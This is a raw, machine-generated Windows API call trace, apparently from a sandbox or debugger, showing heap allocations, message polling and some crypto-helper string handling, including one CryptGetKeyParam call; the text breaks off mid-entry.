[0042.746] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.746] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0042.746] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0042.746] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0042.746] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0042.746] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.746] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0042.746] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1dc8 [0042.746] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da2a8 [0042.746] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1738 [0042.746] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0042.746] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0042.746] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2d8 [0042.746] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8f41) returned 0xac2018 [0042.747] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0042.747] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da198 [0042.747] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0042.747] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0042.747] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0042.747] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1a8 [0042.747] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0042.747] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0042.747] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0042.747] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da2e8 [0042.747] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0042.747] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da358 [0042.747] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0042.747] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c898 [0042.747] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0042.747] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0042.747] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da358 [0042.747] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0042.747] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da218 [0042.747] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8f41) returned 0xad3eb8 [0042.748] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18a0 [0042.748] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0042.748] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0042.748] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0042.748] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0042.748] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0042.748] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b15a8 [0042.748] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0042.748] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0042.748] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0042.748] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17b0 [0042.748] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0042.748] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da268 [0042.748] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0042.748] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0042.748] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.748] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0042.748] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0042.748] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0042.748] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0042.748] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0042.748] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.748] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a80 [0042.748] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0042.748] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0042.748] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0042.748] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18f0 [0042.748] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0042.748] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0042.748] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da278 [0042.748] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0042.748] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da298 [0042.748] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0042.749] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0042.749] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0042.749] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0042.749] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1828 [0042.749] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da298 [0042.749] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a08 [0042.749] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0042.749] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0042.749] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0042.749] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ce38 [0042.749] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0042.749] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0042.749] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0042.749] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0042.749] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1760 [0042.749] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0042.749] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0042.749] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0042.749] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1670 [0042.749] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0042.749] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0042.749] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0042.749] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0042.749] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0042.749] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0042.749] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16e8 [0042.749] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0042.749] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3f8 [0042.749] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0042.749] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0042.749] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0042.749] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3f8 [0042.749] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16c0 [0042.749] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0042.749] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0042.750] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0042.750] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3a8 [0042.750] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0042.750] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0042.750] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0042.750] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0042.750] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0042.750] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da248 [0042.750] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0042.750] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2b8 [0042.750] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0042.750] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0042.750] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0042.750] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0042.750] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0042.750] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0042.750] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0042.750] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da248 [0042.750] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16c0 | out: hHeap=0x770000) returned 1 [0042.750] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0042.750] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0042.750] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0042.750] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16e8 | out: hHeap=0x770000) returned 1 [0042.750] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0042.750] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0042.750] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16e8 [0042.751] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0042.751] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0042.751] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0042.751] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0042.751] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0042.751] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3f8 [0042.751] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0042.751] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2b8 [0042.751] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0042.751] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0042.751] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0042.751] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0042.751] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0042.751] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0042.751] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0042.751] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0042.751] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0042.751] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0042.751] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0042.751] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0042.751] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0042.751] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0042.751] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0042.751] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0042.751] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16e8 | out: hHeap=0x770000) returned 1 [0042.751] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0042.751] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16e8 [0042.751] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0042.751] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3f8 [0042.751] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0042.752] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0042.752] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2b8 [0042.752] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0042.752] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16c0 [0042.752] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0042.752] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0042.752] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0042.752] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0042.752] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0042.752] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.752] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0042.752] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c7f0 [0042.752] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0042.752] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0042.752] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2c8 [0042.752] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0042.752] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0042.752] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0042.752] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0042.752] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0042.752] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0042.752] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0042.752] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0042.752] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0042.752] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0042.752] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0042.752] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0042.752] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0042.752] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0042.752] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0042.753] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0042.753] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0042.753] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0042.753] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0042.753] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0042.753] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0042.753] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0042.753] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0042.753] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0042.753] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0042.753] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0042.753] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0042.753] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0042.753] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0042.753] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0042.753] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0042.753] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0042.753] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0042.753] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16c0 | out: hHeap=0x770000) returned 1 [0042.753] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0042.753] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0042.753] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16c0 [0042.753] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0042.753] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2c8 [0042.753] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0042.753] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0042.753] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0042.753] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0042.753] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0042.753] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0042.754] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0042.754] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0042.754] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2c8 [0042.754] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0042.754] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0042.754] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0042.754] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0042.754] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0042.754] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0042.754] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0042.754] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0042.754] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0042.754] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16c0 | out: hHeap=0x770000) returned 1 [0042.754] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0042.754] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0042.754] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0042.754] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0042.754] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0042.754] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0042.754] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0042.754] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16c0 [0042.754] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0042.754] CryptGetKeyParam (in: hKey=0x7c2280, dwParam=0x7, pbData=0x7da248, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da248*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0042.754] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0042.754] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0042.754] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.755] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.755] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.755] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.755] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0042.755] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) 